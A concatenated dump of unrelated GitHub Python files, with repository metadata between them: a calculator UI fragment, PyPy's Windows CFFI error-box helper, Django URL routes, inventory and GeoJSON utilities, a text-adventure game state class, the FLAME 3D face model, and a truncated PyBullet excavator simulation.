                           ('4', 2, 0), ('5', 2, 1), ('6', 2, 2), ('-', 2, 3),
                           ('1', 3, 0), ('2', 3, 1), ('3', 3, 2), ('*', 3, 3)]:
    # bind the label as a default argument to avoid late-binding closures
    _make_button(_label, _row, _col, lambda v=_label: btnClick(v))

# bottom row gets extra vertical padding, matching the original layout
_make_button('0', 4, 0, lambda: btnClick(0), pady=16)
_make_button('C', 4, 1, btnClearDisplay, pady=16)
_make_button('=', 4, 2, btnEql, pady=16)
_make_button('/', 4, 3, lambda: btnClick('/'), pady=16)
#mainloop
cal.mainloop() | saty035/100-Days-Of-Code-with-Python | Day 5/Calculator.py | Calculator.py | py | 3,101 | python | en | code | 1 | github-code | 36 |
43296847454 | # for Windows only
import sys
from rpython.rlib import jit
from rpython.rtyper.lltypesystem import lltype, rffi
from rpython.translator.tool.cbuild import ExternalCompilationInfo
MESSAGEBOX = sys.platform == "win32"
MODULE = r"""
#include <Windows.h>
#pragma comment(lib, "user32.lib")
static void *volatile _cffi_bootstrap_text;
RPY_EXTERN int _cffi_errorbox1(void)
{
return InterlockedCompareExchangePointer(&_cffi_bootstrap_text,
(void *)1, NULL) == NULL;
}
static DWORD WINAPI _cffi_bootstrap_dialog(LPVOID ignored)
{
Sleep(666); /* may be interrupted if the whole process is closing */
MessageBoxA(NULL, (char *)_cffi_bootstrap_text,
"PyPy: Python-CFFI error",
MB_OK | MB_ICONERROR);
_cffi_bootstrap_text = NULL;
return 0;
}
RPY_EXTERN void _cffi_errorbox(char *text)
{
/* Show a dialog box, but in a background thread, and
never show multiple dialog boxes at once. */
HANDLE h;
_cffi_bootstrap_text = text;
h = CreateThread(NULL, 0, _cffi_bootstrap_dialog,
NULL, 0, NULL);
if (h != NULL)
CloseHandle(h);
}
"""
if MESSAGEBOX:
    # Compile the helper C module (MODULE above) into the translated binary
    # and declare its two entry points so RPython code can call them.
    eci = ExternalCompilationInfo(
        separate_module_sources=[MODULE],
        post_include_bits=["RPY_EXTERN int _cffi_errorbox1(void);\n"
                           "RPY_EXTERN void _cffi_errorbox(char *);\n"])

    # returns 1 only for the first caller while no dialog is pending
    cffi_errorbox1 = rffi.llexternal("_cffi_errorbox1", [],
                                     rffi.INT, compilation_info=eci)
    # shows the captured text in a MessageBox on a background thread
    cffi_errorbox = rffi.llexternal("_cffi_errorbox", [rffi.CCHARP],
                                    lltype.Void, compilation_info=eci)
    class Message:
        """Captures interp-level stderr output and hands it to the C helper,
        which shows it in a Windows MessageBox — so CFFI embedding errors
        are visible even in GUI applications without a console."""
        def __init__(self, space):
            self.space = space
            # keepalive for the raw text buffer handed to the dialog thread
            self.text_p = lltype.nullptr(rffi.CCHARP.TO)

        def start_error_capture(self):
            # Only one dialog at a time: the C side flips an interlocked flag
            # and reports whether we were first.
            ok = cffi_errorbox1()
            if rffi.cast(lltype.Signed, ok) != 1:
                return None
            # App-level code: replace sys.stderr with a tee that records
            # everything written (best-effort forwarding to the old stderr);
            # returns a 'done' callable that restores stderr and yields the
            # accumulated buffer.
            return self.space.appexec([], """():
                import sys
                class FileLike:
                    def write(self, x):
                        try:
                            of.write(x)
                        except:
                            pass
                        self.buf += x
                fl = FileLike()
                fl.buf = ''
                of = sys.stderr
                sys.stderr = fl
                def done():
                    sys.stderr = of
                    return fl.buf
                return done
            """)

        def stop_error_capture(self, w_done):
            if w_done is None:
                return
            # Fetch the captured text, keep the C string alive on self, and
            # pop up the (asynchronous) error box.
            w_text = self.space.call_function(w_done)
            p = rffi.str2charp(self.space.bytes_w(w_text),
                               track_allocation=False)
            if self.text_p:
                rffi.free_charp(self.text_p, track_allocation=False)
            self.text_p = p    # keepalive
            cffi_errorbox(p)
    # Module-level entry points; one Message instance is cached per object
    # space.  Kept out of the JIT because they only run on error paths.
    @jit.dont_look_inside
    def start_error_capture(space):
        msg = space.fromcache(Message)
        return msg.start_error_capture()

    @jit.dont_look_inside
    def stop_error_capture(space, x):
        msg = space.fromcache(Message)
        msg.stop_error_capture(x)

else:
    # non-Windows build: error capture is a no-op
    def start_error_capture(space):
        return None

    def stop_error_capture(space, nothing):
        pass
| mozillazg/pypy | pypy/module/_cffi_backend/errorbox.py | errorbox.py | py | 3,429 | python | en | code | 430 | github-code | 36 |
30993271589 | from django.urls import path
from myproject.apps.board import views
# URL routes for the board app: boards -> topics -> posts hierarchy.
urlpatterns = [
    # path('boards/', views.boards, name='all_boards'),
    path('boards/', views.BoardsView.as_view(), name='all_boards'),
    # topic
    path('board/<int:pk>/topics', views.topics, name='all_topics'),
    path('board/<int:pk>/topics/new', views.new_topic, name='new_topic'),
    # post
    path('board/<int:pk>/topic/<int:topic_pk>/posts', views.posts, name='all_posts'),
    path('board/<int:pk>/topic/<int:topic_pk>/posts/new', views.new_post, name='new_post'),
    # path('board/<int:pk>/topic/<int:topic_pk>/posts/edit',views.PostUpdateView.as_view())
    # url(r'^board/(?P<pk>\d+)/topics/(?P<topic_pk>\d+)/posts/(?P<post_pk>\d+)/edit/$',
    #     boards_views.PostUpdateView.as_view(), name='edit_post'),
]
| SunA0/django_learn | myproject/apps/board/urls.py | urls.py | py | 811 | python | en | code | 0 | github-code | 36 |
23443224445 | from .utils import display_table, read_sold, str_to_date
def show_sold(start_date, end_date):
    """Display every sold-product row whose sale date lies in
    [start_date, end_date] (both given as date strings)."""
    start_date = str_to_date(start_date)
    end_date = str_to_date(end_date)
    header, data = read_sold()
    # the sale date is stored in the last column of each row
    in_range = [row for row in data
                if start_date <= str_to_date(row[-1]) <= end_date]
    title = f"Sold Products (from {start_date} to {end_date})"
    display_table(title, header, in_range)
| sndr157/Inventory | modules/sold.py | sold.py | py | 459 | python | en | code | 0 | github-code | 36 |
33329719512 | #!/bin/env python
import json
import helpers
if __name__ == '__main__':
    root_dir = helpers.root_dir()

    path = "%s/sources/counties.geojson" % root_dir
    print("loading %s" % path)
    # context manager closes the handle even if parsing fails
    # (the original left both files open and never flushed the output)
    with open(path, 'r') as f:
        geojson = json.load(f)

    # map county GEOID -> county name
    data = {}
    for feature in geojson["features"]:
        props = feature["properties"]
        data[props["GEOID"]] = props["NAME"]

    path = "%s/data/counties.json" % root_dir
    print("saving %s" % path)
    # text mode: json.dump writes str, so the original 'wb' mode raises
    # TypeError on Python 3; the with-block also guarantees the flush
    with open(path, 'w') as f:
        json.dump(data, f, sort_keys=True)
| knightmirnj/acluedtool | counties.py | counties.py | py | 524 | python | en | code | 0 | github-code | 36 |
72749247463 | import json
import gamestate
from enum import Enum
from typing import List, Dict
import city
import items
import time
from main_menu import GAME_WIDTH, dotted_line, empty_line, print_in_the_middle, print_left_indented, write_over, \
go_up_and_clear, yes_no_selection, clear_screen, informScreen
from narration import narration, left_narration
import puzzles
class GameAction(gamestate.GameState):
    """Facade over a GameState instance: all reads/updates of the game state
    (location, inventory, clues, legendary items, and the endgame sequence)
    go through this class."""
    def __init__(self, game_state: gamestate.GameState):
        self.game_state = game_state
    @property
    # Get map_arr
    def map_arr(self) -> List[city.District]:
        return self.game_state._map_arr
    # Set map_arr
    def set_map_arr(self, map_arr: List[city.District]):
        self.game_state._map_arr = map_arr
    @property
    # Return turns remaining
    def turns_remaining(self) -> int:
        return self.game_state._turns_remaining
    # Decrement turns remaining
    def decrement_turns_remaining(self) -> None:
        self.game_state._turns_remaining -= 1
    @property
    # Return current location
    def current_location(self) -> str:
        return self.game_state._current_location
    # Check if lair has been discovered
    def lair_discovered(self) -> bool:
        # standing on the lair only counts once the Vision Orb has been found
        return self.game_state._current_location == self.game_state._lair_location and self.game_state._vision_orb == True
    # Change location
    def change_location(self, new_location: str) -> int:
        """Move to *new_location*; returns 0 on success, 1 for an unknown district."""
        valid_location = False
        new_location = new_location.lower()
        if new_location in gamestate.District.__members__:
            valid_location = True
        if valid_location:
            self.game_state._current_location = gamestate.District[new_location].name
            return 0
        else:
            return 1
    # Check legendary items collected
    def check_legendary(self) -> List[str]:
        """Status strings for the 4 legendary items, in fixed order:
        "On Hand" (found and carried), "Found  " (found, not carried),
        or "Unknown"."""
        legendary_status = [None] * 4
        legend_list = [ (self.game_state._vision_orb, "Vision Orb"),
                        (self.game_state._strength_orb, "Strength Orb"),
                        (self.game_state._vitality_orb, "Vitality Orb"),
                        (self.game_state._magic_sword, "Magic Sword") ]
        for i in range(len(legend_list)):
            if legend_list[i][0]:
                if self.check_inventory_by_name(legend_list[i][1]):
                    legendary_status[i] = "On Hand"
                else:
                    legendary_status[i] = "Found  "
            else:
                legendary_status[i] = "Unknown"
        return legendary_status
    @property
    # Return inventory
    def current_inventory(self) -> List[items.Item]:
        return self.game_state._current_inventory
    # Check if there's space in inventory
    def space_in_inventory(self) -> bool:
        return len(self.current_inventory) < gamestate.MAX_INVENTORY
    # Add item to inventory
    def add_to_inventory(self, new_item: items.Item) -> int:
        """Append *new_item*; returns 0 on success, 1 when the inventory is full."""
        valid_item = True
        if len(self.game_state._current_inventory) >= gamestate.MAX_INVENTORY:
            valid_item = False
        elif (True): # TODO: validate item
            pass
        if valid_item:
            self.game_state._current_inventory.append(new_item)
            return 0
        else:
            return 1
    # Remove item from inventory
    def remove_from_inventory(self, item_to_remove: items.Item) -> int:
        # returns 0 when removed, 1 when the item was not present
        if item_to_remove in self.game_state._current_inventory:
            self.game_state._current_inventory.remove(item_to_remove)
            return 0
        else:
            return 1
    # Check if item exists in inventory
    def check_inventory(self, item: items.Item) -> bool:
        if item in self.game_state._current_inventory:
            return True
        return False
    # Check if item exists in inventory by name
    def check_inventory_by_name(self, item_name: str) -> bool:
        # NOTE(review): exact, case-sensitive match here, unlike the
        # case-insensitive get/remove *_by_name helpers below — confirm intended
        for i in range(len(self.game_state._current_inventory)):
            if item_name == self.game_state._current_inventory[i].name:
                return True
        return False
    # Get item from inventory by name
    def get_item_from_inventory_by_name(self, item_name: str) -> items.Item:
        # case-insensitive lookup; implicitly returns None when nothing matches
        for item in self.game_state._current_inventory:
            if item.name.lower() == item_name.lower():
                return item
    # Remove item from inventory
    def remove_item_from_inventory(self, item: items.Item):
        self.game_state._current_inventory.remove(item)
    # Remove item from inventory by name
    def remove_item_from_inventory_by_name(self, item_name: str):
        # case-insensitive; assumes the item is present (item_index stays None
        # otherwise and the del below would raise TypeError)
        item_index = None
        for i in range(len(self.game_state._current_inventory)):
            if self.game_state._current_inventory[i].name.lower() == item_name.lower():
                item_index = i
                break
        del self.game_state._current_inventory[item_index]
    # Get item from uncollected_legendary_items array by name
    def get_item_from_uncollected_legendary_items(self, item_name: str) -> items.Item:
        # exact-name lookup; implicitly returns None when nothing matches
        for item in self.game_state.uncollected_legendary_items:
            if item.name == item_name:
                return item
    # Remove item from uncollected_legendary_items array by name
    def remove_item_from_uncollected_legendary_items(self, item_name: str):
        item_index = None
        for i in range(len(self.game_state.uncollected_legendary_items)):
            if self.game_state.uncollected_legendary_items[i].name == item_name:
                item_index = i
                break
        del self.game_state.uncollected_legendary_items[item_index]
    @property
    # Return obtained clues in an ascending order by clue_id
    def obtained_clues(self) -> List[str]:
        return self.game_state._obtained_clues
    # Add clue to obtained clues
    def add_to_obtained_clues(self, clue_text: str):
        self.game_state._obtained_clues.append(clue_text)
    # Check if district has been visited
    def check_visited(self, district_name: str) -> bool:
        # NOTE(review): raises ValueError for a bad name, while change_visited
        # below returns an error code instead — inconsistent error contracts
        district_name = district_name.lower()
        if district_name in gamestate.District.__members__:
            proper_name = gamestate.District[district_name].name
            return self.game_state._visited[proper_name]
        else:
            raise ValueError("A bad district_name was supplied.")
    # Change district to visited
    def change_visited(self, district_name: str) -> int:
        # returns 0 on success, 1 for an unknown district name
        district_name = district_name.lower()
        if district_name in gamestate.District.__members__:
            proper_name = gamestate.District[district_name].name
            self.game_state._visited[proper_name] = True
            return 0
        else:
            return 1
    def enter_lair_confirmation(self) -> int:
        """Draw a yes/no confirmation screen before entering the lair and
        return the yes_no_selection code (2 means the user chose 'No')."""
        msg1 = "Are you sure you want to continue into the Lair?"
        msg2 = "Once you've entered, there's no going back!"
        clear_screen()
        dotted_line(GAME_WIDTH)
        empty_line(1)
        print_in_the_middle(GAME_WIDTH, msg1)
        print_in_the_middle(GAME_WIDTH, msg2)
        empty_line(1)
        dotted_line(GAME_WIDTH)
        selection = yes_no_selection(input("Yes/No >>> "))
        return selection
    def narration_screen(self, narr):
        """Show *narr* framed by dotted lines and wait for [Enter]."""
        clear_screen()
        dotted_line(GAME_WIDTH)
        empty_line(2)
        narration(narr, GAME_WIDTH)
        empty_line(2)
        dotted_line(GAME_WIDTH)
        input("Press [Enter] to continue...")
        clear_screen()
    # Dr. Crime's lair final game sequence
    def final_game_sequence(self) -> str:
        """Run the endgame: verify all legendary items are carried, confirm
        entry, then play the boss puzzles in order. Returns "wingame",
        "losegame", or "" when the player aborts / is not ready."""
        number_of_tries = 8
        story1 = "You've entered the lair and encountered Dr. Crime. There are " + str(len(self.game_state.boss_puzzles))+ " puzzles " \
                 "you must solve. You must answer all puzzles correctly in order to defeat Dr. Crime and win the game. " \
                 "And you are only be allowed " + str(number_of_tries) + " wrong answer tries."
        wrong_narr = "Dr. Crime says, 'You are foolish to think you can outsmart me.'"
        right1 = "Dr. Crime says, 'That was a lucky guess. Let's see how you do on this next one.'"
        right2 = "Dr. Crime says, 'Well, you're smarter than you look. Fine, you won't be able to solve this next one.'"
        right3 = "Dr. Crime says, 'Arghhhh, who do you think you are?! You most definitely will not get this next one.'"
        right4 = "As you raise up your Magic Sword, Dr. Crime's eyes glisten with fear. You quickly drop the sword, letting" \
                 " the weight cut Dr. Crime. You rest easy knowing Dr. Crime can no longer poison the city."
        # Check all legendary items are in user's inventory to allow user to proceed
        legendary_items_status = self.check_legendary()
        for status in legendary_items_status:
            if status != "On Hand":
                informScreen("You need all 4 Legendary items in your inventory to proceed!")
                return ""
        # Check if user wishes to proceed
        if self.enter_lair_confirmation() == 2: # User chooses 'no'
            return ""
        # Play all boss puzzles
        self.narration_screen(story1)
        status, number_of_tries = self.game_state.boss_puzzles[0].play_boss_puzzle(number_of_tries)
        if status == False:
            self.narration_screen(wrong_narr)
            return "losegame"
        self.narration_screen(right1)
        status, number_of_tries = self.game_state.boss_puzzles[1].play_boss_puzzle(number_of_tries)
        if status == False:
            self.narration_screen(wrong_narr)
            return "losegame"
        self.narration_screen(right2)
        status, number_of_tries = self.game_state.boss_puzzles[2].play_boss_puzzle(number_of_tries)
        if status == False:
            self.narration_screen(wrong_narr)
            return "losegame"
        self.narration_screen(right3)
        status, number_of_tries = self.game_state.boss_puzzles[3].play_boss_puzzle(number_of_tries)
        if status == False:
            self.narration_screen(wrong_narr)
            return "losegame"
        self.narration_screen(right4)
        return "wingame"
| farbill/capricornus | gameaction.py | gameaction.py | py | 10,119 | python | en | code | 1 | github-code | 36 |
70563793064 | import os
import pickle
import numpy as np
# Modified from smplx code for FLAME
import torch
import torch.nn as nn
import torch.nn.functional as F
from pytorch3d.transforms import rotation_6d_to_matrix, matrix_to_rotation_6d
from skimage.io import imread
from loguru import logger
from flame.lbs import lbs
I = matrix_to_rotation_6d(torch.eye(3)[None].cuda())
def to_tensor(array, dtype=torch.float32):
    """Convert *array* to a torch tensor of *dtype*.

    Fixes the upstream FLAME helper, whose type-name check implicitly
    returned None whenever the early-exit branch was taken (intended for
    inputs that already are tensors): existing tensors are now returned
    converted to the requested dtype, everything else is wrapped with
    torch.tensor.
    """
    if torch.is_tensor(array):
        # already a tensor: just align the dtype instead of returning None
        return array.to(dtype)
    return torch.tensor(array, dtype=dtype)
def to_np(array, dtype=np.float32):
    """Return *array* as a dense numpy array of the requested dtype."""
    # scipy sparse matrices must be densified first; the check is done by
    # type name so scipy is not a hard import dependency
    is_sparse = 'scipy.sparse' in str(type(array))
    dense = array.todense() if is_sparse else array
    return np.array(dense, dtype=dtype)
class Struct(object):
    """Lightweight attribute bag: Struct(a=1).a == 1 (used to wrap the
    unpickled FLAME model dict)."""
    def __init__(self, **kwargs):
        self.__dict__.update(kwargs)
def rot_mat_to_euler(rot_mats):
    """Extract one Euler angle from a batch of rotation matrices.
    Careful with extreme (gimbal-lock) cases such as [0.0, pi, 0.0]."""
    r00 = rot_mats[:, 0, 0]
    r10 = rot_mats[:, 1, 0]
    r20 = rot_mats[:, 2, 0]
    sy = torch.sqrt(r00 * r00 + r10 * r10)
    return torch.atan2(-r20, sy)
class FLAME(nn.Module):
"""
borrowed from https://github.com/soubhiksanyal/FLAME_PyTorch/blob/master/FLAME.py
Given FLAME parameters for shape, pose, and expression, this class generates a differentiable FLAME function
which outputs the a mesh and 2D/3D facial landmarks
"""
def __init__(self, config):
super(FLAME, self).__init__()
logger.info(f"[FLAME] Creating the 3DMM from {config.flame_geom_path}")
with open(config.flame_geom_path, 'rb') as f:
ss = pickle.load(f, encoding='latin1')
flame_model = Struct(**ss)
self.dtype = torch.float32
self.register_buffer('faces', to_tensor(to_np(flame_model.f, dtype=np.int64), dtype=torch.long))
# The vertices of the template model
self.register_buffer('v_template', to_tensor(to_np(flame_model.v_template), dtype=self.dtype))
# The shape components and expression
shapedirs = to_tensor(to_np(flame_model.shapedirs), dtype=self.dtype)
shapedirs = torch.cat([shapedirs[:, :, :config.num_shape_params], shapedirs[:, :, 300:300 + config.num_exp_params]], 2)
self.register_buffer('shapedirs', shapedirs)
# The pose components
num_pose_basis = flame_model.posedirs.shape[-1]
posedirs = np.reshape(flame_model.posedirs, [-1, num_pose_basis]).T
self.register_buffer('posedirs', to_tensor(to_np(posedirs), dtype=self.dtype))
#
self.register_buffer('J_regressor', to_tensor(to_np(flame_model.J_regressor), dtype=self.dtype))
parents = to_tensor(to_np(flame_model.kintree_table[0])).long();
parents[0] = -1
self.register_buffer('parents', parents)
self.register_buffer('lbs_weights', to_tensor(to_np(flame_model.weights), dtype=self.dtype))
self.register_buffer('l_eyelid', torch.from_numpy(np.load(f'{os.path.abspath(os.path.dirname(__file__))}/blendshapes/l_eyelid.npy')).to(self.dtype)[None])
self.register_buffer('r_eyelid', torch.from_numpy(np.load(f'{os.path.abspath(os.path.dirname(__file__))}/blendshapes/r_eyelid.npy')).to(self.dtype)[None])
# Register default parameters
self._register_default_params('neck_pose_params', 6)
self._register_default_params('jaw_pose_params', 6)
self._register_default_params('eye_pose_params', 12)
self._register_default_params('shape_params', config.num_shape_params)
self._register_default_params('expression_params', config.num_exp_params)
# Static and Dynamic Landmark embeddings for FLAME
mediapipe_lmk_embedding = np.load('flame/mediapipe/mediapipe_landmark_embedding.npz', allow_pickle=True, encoding='latin1')
lmk_embeddings = np.load(config.flame_lmk_path, allow_pickle=True, encoding='latin1')
lmk_embeddings = lmk_embeddings[()]
self.mediapipe_idx = mediapipe_lmk_embedding['landmark_indices'].astype(int)
self.register_buffer('mp_lmk_faces_idx', torch.from_numpy(mediapipe_lmk_embedding['lmk_face_idx'].astype(int)).to(torch.int64))
self.register_buffer('mp_lmk_bary_coords', torch.from_numpy(mediapipe_lmk_embedding['lmk_b_coords']).to(self.dtype).float())
self.register_buffer('lmk_faces_idx', torch.from_numpy(lmk_embeddings['static_lmk_faces_idx'].astype(int)).to(torch.int64))
self.register_buffer('lmk_bary_coords', torch.from_numpy(lmk_embeddings['static_lmk_bary_coords']).to(self.dtype).float())
self.register_buffer('dynamic_lmk_faces_idx', torch.from_numpy(np.array(lmk_embeddings['dynamic_lmk_faces_idx']).astype(int)).to(torch.int64))
self.register_buffer('dynamic_lmk_bary_coords', torch.from_numpy(np.array(lmk_embeddings['dynamic_lmk_bary_coords'])).to(self.dtype).float())
neck_kin_chain = []
NECK_IDX = 1
curr_idx = torch.tensor(NECK_IDX, dtype=torch.long)
while curr_idx != -1:
neck_kin_chain.append(curr_idx)
curr_idx = self.parents[curr_idx]
self.register_buffer('neck_kin_chain', torch.stack(neck_kin_chain))
    def _find_dynamic_lmk_idx_and_bcoords(self, vertices, pose, dynamic_lmk_faces_idx,
                                          dynamic_lmk_b_coords,
                                          neck_kin_chain, cameras, dtype=torch.float32):
        """
        Selects the face contour depending on the relative position of the head
        Input:
            vertices: N X num_of_vertices X 3
            pose: N X full pose (per-joint 6D rotation representation)
            dynamic_lmk_faces_idx: The list of contour face indexes
            dynamic_lmk_b_coords: The list of contour barycentric weights
            neck_kin_chain: The tree to consider for the relative rotation
            cameras: N X 3 X 3 camera rotation applied on top of the head rotation
            dtype: Data type
        return:
            The contour face indexes and the corresponding barycentric weights
        """
        batch_size = vertices.shape[0]
        # Gather the 6D rotations of the joints along the neck kinematic chain.
        aa_pose = torch.index_select(pose.view(batch_size, -1, 6), 1, neck_kin_chain)
        rot_mats = rotation_6d_to_matrix(aa_pose.view(-1, 6)).view([batch_size, -1, 3, 3])
        # Compose the chain rotations into a single relative head rotation.
        rel_rot_mat = torch.eye(3, device=vertices.device, dtype=dtype).unsqueeze_(dim=0).expand(batch_size, -1, -1)
        for idx in range(len(neck_kin_chain)):
            rel_rot_mat = torch.bmm(rot_mats[:, idx], rel_rot_mat)
        rel_rot_mat = cameras @ rel_rot_mat  # Cameras flips z and x, plus multiview needs different lmk sliding per view
        # Quantize the head yaw to whole degrees, capped at 39; the dynamic
        # contour tables hold one row per degree (negative yaws map to the
        # 39..78 index range via the mask arithmetic below).
        y_rot_angle = torch.round(torch.clamp(-rot_mat_to_euler(rel_rot_mat) * 180.0 / np.pi, max=39)).to(dtype=torch.long)
        neg_mask = y_rot_angle.lt(0).to(dtype=torch.long)
        mask = y_rot_angle.lt(-39).to(dtype=torch.long)
        neg_vals = mask * 78 + (1 - mask) * (39 - y_rot_angle)
        y_rot_angle = (neg_mask * neg_vals + (1 - neg_mask) * y_rot_angle)
        # Look up the per-angle contour faces and barycentric weights.
        dyn_lmk_faces_idx = torch.index_select(dynamic_lmk_faces_idx, 0, y_rot_angle)
        dyn_lmk_b_coords = torch.index_select(dynamic_lmk_b_coords, 0, y_rot_angle)
        return dyn_lmk_faces_idx, dyn_lmk_b_coords
def _vertices2landmarks(self, vertices, faces, lmk_faces_idx, lmk_bary_coords):
"""
Calculates landmarks by barycentric interpolation
Input:
vertices: torch.tensor NxVx3, dtype = torch.float32
The tensor of input vertices
faces: torch.tensor (N*F)x3, dtype = torch.long
The faces of the mesh
lmk_faces_idx: torch.tensor N X L, dtype = torch.long
The tensor with the indices of the faces used to calculate the
landmarks.
lmk_bary_coords: torch.tensor N X L X 3, dtype = torch.float32
The tensor of barycentric coordinates that are used to interpolate
the landmarks
Returns:
landmarks: torch.tensor NxLx3, dtype = torch.float32
The coordinates of the landmarks for each mesh in the batch
"""
# Extract the indices of the vertices for each face
# NxLx3
batch_size, num_verts = vertices.shape[:2]
device = vertices.device
lmk_faces = torch.index_select(faces, 0, lmk_faces_idx.view(-1).to(torch.long)).view(batch_size, -1, 3)
lmk_faces += torch.arange(batch_size, dtype=torch.long, device=device).view(-1, 1, 1) * num_verts
lmk_vertices = vertices.view(-1, 3)[lmk_faces].view(batch_size, -1, 3, 3)
landmarks = torch.einsum('blfi,blf->bli', [lmk_vertices, lmk_bary_coords])
return landmarks
def forward(self, shape_params, cameras, trans_params=None, rot_params=None, neck_pose_params=None, jaw_pose_params=None, eye_pose_params=None, expression_params=None, eyelid_params=None):
"""
Input:
trans_params: N X 3 global translation
rot_params: N X 3 global rotation around the root joint of the kinematic tree (rotation is NOT around the origin!)
neck_pose_params (optional): N X 3 rotation of the head vertices around the neck joint
jaw_pose_params (optional): N X 3 rotation of the jaw
eye_pose_params (optional): N X 6 rotations of left (parameters [0:3]) and right eyeball (parameters [3:6])
shape_params (optional): N X number of shape parameters
expression_params (optional): N X number of expression parameters
return:d
vertices: N X V X 3
landmarks: N X number of landmarks X 3
"""
batch_size = shape_params.shape[0]
I = matrix_to_rotation_6d(torch.cat([torch.eye(3)[None]] * batch_size, dim=0).cuda())
if trans_params is None:
trans_params = torch.zeros(batch_size, 3).cuda()
if rot_params is None:
rot_params = I.clone()
if neck_pose_params is None:
neck_pose_params = I.clone()
if jaw_pose_params is None:
jaw_pose_params = I.clone()
if eye_pose_params is None:
eye_pose_params = torch.cat([I.clone()] * 2, dim=1)
if shape_params is None:
shape_params = self.shape_params.expand(batch_size, -1)
if expression_params is None:
expression_params = self.expression_params.expand(batch_size, -1)
# Concatenate identity shape and expression parameters
betas = torch.cat([shape_params, expression_params], dim=1)
# The pose vector contains global rotation, and neck, jaw, and eyeball rotations
full_pose = torch.cat([rot_params, neck_pose_params, jaw_pose_params, eye_pose_params], dim=1)
# FLAME models shape and expression deformations as vertex offset from the mean face in 'zero pose', called v_template
template_vertices = self.v_template.unsqueeze(0).expand(batch_size, -1, -1)
# Use linear blendskinning to model pose roations
vertices, _ = lbs(betas, full_pose, template_vertices,
self.shapedirs, self.posedirs,
self.J_regressor, self.parents,
self.lbs_weights, dtype=self.dtype)
if eyelid_params is not None:
vertices = vertices + self.r_eyelid.expand(batch_size, -1, -1) * eyelid_params[:, 1:2, None]
vertices = vertices + self.l_eyelid.expand(batch_size, -1, -1) * eyelid_params[:, 0:1, None]
lmk_faces_idx = self.lmk_faces_idx.unsqueeze(dim=0).expand(batch_size, -1).contiguous()
lmk_bary_coords = self.lmk_bary_coords.unsqueeze(dim=0).expand(batch_size, -1, -1).contiguous()
dyn_lmk_faces_idx, dyn_lmk_bary_coords = self._find_dynamic_lmk_idx_and_bcoords(
vertices, full_pose, self.dynamic_lmk_faces_idx,
self.dynamic_lmk_bary_coords,
self.neck_kin_chain, cameras, dtype=self.dtype)
lmk_faces_idx = torch.cat([dyn_lmk_faces_idx, lmk_faces_idx], 1)
lmk_bary_coords = torch.cat([dyn_lmk_bary_coords, lmk_bary_coords], 1)
lmk68 = self._vertices2landmarks(vertices, self.faces, lmk_faces_idx, lmk_bary_coords)
mp_lmk_faces_idx = self.mp_lmk_faces_idx.unsqueeze(dim=0).expand(batch_size, -1).contiguous()
mp_lmk_bary_coords = self.mp_lmk_bary_coords.unsqueeze(dim=0).expand(batch_size, -1, -1).contiguous()
mp = self._vertices2landmarks(vertices, self.faces, mp_lmk_faces_idx, mp_lmk_bary_coords)
vertices = vertices + trans_params.unsqueeze(dim=1)
lmk68 = lmk68 + trans_params.unsqueeze(dim=1)
mp = mp + trans_params.unsqueeze(dim=1)
return vertices, lmk68, mp
def _register_default_params(self, param_fname, dim):
default_params = torch.zeros([1, dim], dtype=self.dtype, requires_grad=False)
self.register_parameter(param_fname, nn.Parameter(default_params, requires_grad=False))
class FLAMETex(nn.Module):
    """FLAME texture model: decodes a texture code into an albedo image.

    Loads either the native FLAME texture PCA space or a BFM-converted one,
    and can short-circuit to a fixed per-actor texture image if present.
    """
    def __init__(self, config):
        super(FLAMETex, self).__init__()
        tex_space = np.load(config.tex_space_path)
        # FLAME texture
        if 'tex_dir' in tex_space.files:
            mu_key = 'mean'
            pc_key = 'tex_dir'
            n_pc = 200
            scale = 1
        # BFM to FLAME texture
        else:
            mu_key = 'MU'
            pc_key = 'PC'
            n_pc = 199
            scale = 255.0  # presumably BFM stores values in [0, 1] -- TODO confirm
        texture_mean = tex_space[mu_key].reshape(1, -1)
        texture_basis = tex_space[pc_key].reshape(-1, n_pc)
        # Keep only the first config.tex_params principal components.
        n_tex = config.tex_params
        texture_mean = torch.from_numpy(texture_mean).float()[None, ...] * scale
        texture_basis = torch.from_numpy(texture_basis[:, :n_tex]).float()[None, ...] * scale
        self.texture = None  # optional fixed texture image, set by check_texture()
        self.register_buffer('texture_mean', texture_mean)
        self.register_buffer('texture_basis', texture_basis)
        self.image_size = config.image_size
        self.check_texture(config)
    def check_texture(self, config):
        # If the actor directory ships a baked texture.png, use it verbatim
        # (first 3 channels, scaled to [0, 1]).
        # NOTE(review): hard-coded .cuda() -- assumes CUDA is available.
        path = os.path.join(config.actor, 'texture.png')
        if os.path.exists(path):
            self.texture = torch.from_numpy(imread(path)).permute(2, 0, 1).cuda()[None, 0:3, :, :] / 255.0
    def forward(self, texcode):
        # A fixed texture overrides the PCA decoding entirely.
        if self.texture is not None:
            return F.interpolate(self.texture, self.image_size, mode='bilinear')
        # Linear model: mean + basis weighted by the texture code, reshaped
        # to a 512x512 image in NCHW layout.
        texture = self.texture_mean + (self.texture_basis * texcode[:, None, :]).sum(-1)
        texture = texture.reshape(texcode.shape[0], 512, 512, 3).permute(0, 3, 1, 2)
        texture = F.interpolate(texture, self.image_size, mode='bilinear')
        texture = texture[:, [2, 1, 0], :, :]  # swap first/last channels (BGR<->RGB) -- TODO confirm ordering
        return texture / 255.
| Zielon/metrical-tracker | flame/FLAME.py | FLAME.py | py | 14,729 | python | en | code | 188 | github-code | 36 |
15636919766 | import pybullet as p
import time
import pybullet_data
import math
import numpy as np
# Connect to the PyBullet GUI server and load the ground plane plus the
# excavator model at a fixed spawn height.
physicsClient = p.connect(p.GUI)#or p.DIRECT for non-graphical version
p.setAdditionalSearchPath(pybullet_data.getDataPath()) #optionally
p.setGravity(0,0,-10)
planeId = p.loadURDF("plane.urdf")
startPos = [0, 0, 1.4054411813121799]
startOrientation = p.getQuaternionFromEuler([0,0,0])
boxId = p.loadURDF("aba_excavator/excavator.urdf",startPos, startOrientation)
# Drive the arm joints with velocity control for 1000 steps (~4.2 s of
# simulated time at 240 Hz). Joint 1 is held still; joints 2 and 3 get a
# high force limit so they can lift the arm.
for i in range(1000):
    p.setJointMotorControl2(boxId, 1 , p.VELOCITY_CONTROL, targetVelocity = 0)
    p.setJointMotorControl2(boxId, 2 , p.VELOCITY_CONTROL, targetVelocity = 0.4, force= 250_000)
    p.setJointMotorControl2(boxId, 3 , p.VELOCITY_CONTROL, targetVelocity = 0.1, force= 250_000)
    p.setJointMotorControl2(boxId, 4 , p.VELOCITY_CONTROL, targetVelocity = 0.1)
    # (linkWorldPosition,
    # linkWorldOrientation,
    # localInertialFramePosition,
    # localInertialFrameOrientation,
